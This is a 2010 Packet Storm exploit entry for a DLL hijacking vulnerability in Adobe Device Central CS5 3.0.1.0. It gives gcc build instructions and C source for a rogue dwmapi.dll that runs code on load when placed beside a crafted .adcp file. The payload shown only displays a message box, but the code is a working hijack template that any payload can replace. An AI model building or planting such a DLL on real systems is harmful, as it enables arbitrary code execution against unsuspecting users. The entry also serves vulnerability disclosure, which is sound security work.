Adobe Device Central CS5 3.0.1.0 DLL Hijacking Exploit

2010-08-26T00:00:00
ID PACKETSTORM:93135
Type packetstorm
Reporter LiquidWorm
Modified 2010-08-26T00:00:00

Description

                                        
                                            `/*  
  
Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit  
  
Vendor: Adobe Systems Inc.  
Product Web Page: http://www.adobe.com  
Affected Version: CS5 v3.0.1.0 (3027)  
  
Summary: Adobe® Device Central CS5 software simplifies the production  
of innovative and compelling content for mobile phones and consumer  
electronics devices. Adobe Device Central CS5 now offers support for  
HTML and the latest versions of Adobe Flash® Player software.  
  
Desc: Adobe Device Central CS5 suffers from a dll hijacking vulnerability  
that enables the attacker to execute arbitrary code on a local level. The  
vulnerable extensions are .adcp, .adpp, .advs, .ascs and .prf thru dwmapi.dll  
library.  
  
----  
gcc -shared -o dwmapi.dll adobedc.c  
  
Compile and rename to dwmapi.dll, create a file test.adcp or any of the above  
vulnerable extensions and put both files in same dir and execute.  
----  
  
Tested on Microsoft Windows XP Professional SP3 (EN)  
  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
liquidworm gmail com  
  
Zero Science Lab - http://www.zeroscience.mk  
  
  
25.08.2010  
  
*/  
  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
dll_mll();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
int dll_mll()  
{  
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);  
}  
`